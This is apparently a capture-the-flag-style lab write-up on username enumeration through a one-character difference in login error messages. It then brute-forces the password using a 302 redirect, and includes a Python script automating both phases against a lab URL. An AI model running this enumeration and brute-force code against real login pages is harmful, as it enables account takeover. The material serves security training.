Authentication Vulnerabilities - Lab #4: Username enumeration via subtly different responses
2023-12-11 11:50:2 Author: infosecwriteups.com

Let's log in with random credentials and watch the response.

OK. Note the exact error message returned for an invalid login: Invalid username and password.

Let's fire up Burp Suite.

Send the login request to Intruder (Ctrl + I).

In Intruder:
- First clear the payload positions
- Select the username value and click Add
- Make sure the attack type is Sniper

Now go to the Payloads section:
- Set the payload type to Simple list
- Paste the username list (the username and password wordlists are given in the lab)
- Click Start attack

In the results I first looked for differences in the Length column, but every response was the same length, so that column does not help here. Instead, copy the exact error text we get after entering invalid credentials: Invalid username and password.

Let's use this line of text to filter the responses. For a valid username we might get a different response, perhaps something like Incorrect password. Let's see what happens.

Paste the copied text into the grep filter and tick Negative search.
Why negative search? A negative search returns only the responses that do not match the entered text, and that is exactly what we want: anything that deviates from the standard error message.

That leaves one response. Let's check it.
In the Render view it still shows the same Invalid username and password error.
So how is this different?
Look closely at the response body: it is missing the trailing full stop.
When the username was incorrect we were shown Invalid username and password. (with a full stop), but in this case it displays Invalid username and password (without the full stop). That one-character difference is the whole leak.

You can use the Comparer tool to compare the two responses and see the difference more clearly.

OK, now we have a valid username.
Let's find the password.

Go back to Intruder:
- Clear the payload positions
- Change the username to the one we just found
- Select the password value and click Add

In the Payloads options:
- Click Clear to remove the previous username payloads
- Copy the password wordlist from the lab and paste it in
- Start the attack

And we get the result:

All the other results have status 200; only one returns 302, the redirect the application issues after a successful login,
so that payload should be the password.

Let's try to log in.

And we solved the lab.
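The same two phases can be scripted outside Burp. The block below is an added example, not the author's code or PortSwigger's: it assumes the lab's login form posts `username` and `password` fields to a URL you supply, and that `requests` is installed for live use. The `fake_lab_transport` stand-in, the placeholder user `carlos` and password `letmein` are constructed so the logic runs offline; they reproduce the behaviour described above (trailing full stop for an unknown user, no full stop for a valid user, 302 for the correct pair). It also generalises the grep negative-search step: rather than matching one known error string, it treats the most common response as the baseline and reports everything that deviates, which still works when more than one username is valid.

```python
"""Added example (not the author's code): scripting both lab phases outside Burp.

Assumptions: the login form posts `username` and `password` to a URL you supply;
`requests` is only needed for the real transport. Everything below also runs
offline against a constructed stand-in for the lab server.
"""
from __future__ import annotations

import difflib
import hashlib
from collections import Counter
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# A transport takes (username, password) and returns (status_code, body).
# It is injectable so the enumeration logic can be exercised against fake responses.
Transport = Callable[[str, str], Tuple[int, str]]


def fingerprint(status: int, body: str) -> Tuple[int, int, str]:
    """Status code, body length and a hash of the body.

    Length alone missed the lab's difference (one trailing full stop);
    hashing the full body catches any single-byte change.
    """
    return status, len(body), hashlib.sha256(body.encode()).hexdigest()


def find_outliers(responses: Dict[str, Tuple[int, str]]) -> List[str]:
    """Return the candidates whose response deviates from the majority.

    Most of a wordlist gets the same reply ("Invalid username and password."),
    so the most common fingerprint is the baseline; anything else is interesting.
    """
    fps = {cand: fingerprint(*resp) for cand, resp in responses.items()}
    if not fps:
        return []
    baseline, _ = Counter(fps.values()).most_common(1)[0]
    return [cand for cand, fp in fps.items() if fp != baseline]


def enumerate_usernames(send: Transport, usernames: Iterable[str],
                        dummy_password: str = "invalid") -> List[str]:
    """Phase 1: probe each username with a throwaway password, keep the outliers."""
    responses = {user: send(user, dummy_password) for user in usernames}
    return find_outliers(responses)


def show_diff(baseline: str, candidate: str) -> List[str]:
    """Comparer-style view: only the lines that differ between two bodies."""
    return [line for line in difflib.ndiff(baseline.splitlines(), candidate.splitlines())
            if line.startswith(("- ", "+ ", "? "))]


def brute_force_password(send: Transport, username: str, passwords: Iterable[str],
                         success_status: int = 302) -> Optional[str]:
    """Phase 2: a correct login answers with a 302 redirect, everything else
    with 200, so the status code alone separates the hit from the misses."""
    for password in passwords:
        status, _ = send(username, password)
        if status == success_status:
            return password
    return None


def make_http_transport(login_url: str) -> Transport:
    """Live transport. allow_redirects=False matters: if requests followed
    the 302, the successful login would come back looking like a 200."""
    import requests  # assumed installed; only needed for live use

    def send(username: str, password: str) -> Tuple[int, str]:
        resp = requests.post(login_url, data={"username": username, "password": password},
                             allow_redirects=False, timeout=10)
        return resp.status_code, resp.text

    return send


# Constructed stand-in for the lab server (placeholder values, not real traffic):
# unknown user -> message with a trailing full stop, valid user -> without,
# correct pair -> 302 redirect with an empty body.
FAKE_USER = "carlos"
FAKE_PASSWORD = "letmein"


def fake_lab_transport(username: str, password: str) -> Tuple[int, str]:
    if username == FAKE_USER and password == FAKE_PASSWORD:
        return 302, ""
    if username == FAKE_USER:
        return 200, "<p class=is-warning>Invalid username and password</p>"
    return 200, "<p class=is-warning>Invalid username and password.</p>"


if __name__ == "__main__":
    users = ["admin", "root", "carlos", "guest", "test"]
    candidates = enumerate_usernames(fake_lab_transport, users)
    print("username outliers:", candidates)
    base_body = fake_lab_transport("admin", "invalid")[1]
    for line in show_diff(base_body, fake_lab_transport(candidates[0], "invalid")[1]):
        print(line)
    print("password:", brute_force_password(fake_lab_transport, candidates[0],
                                            ["password", "123456", "letmein"]))
```

For the real lab, swap `fake_lab_transport` for `make_http_transport("https://<your-lab-id>.web-security-academy.net/login")` and feed it the wordlists from the lab page; keep `allow_redirects=False`, otherwise the 302 that marks the correct password is followed and hidden.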


Source: https://infosecwriteups.com/authentication-vulnerabilities-lab-4-username-enumeration-via-subtly-different-responses-5eb512d899fa?source=rss----7b722bfd1b8d--bug_bounty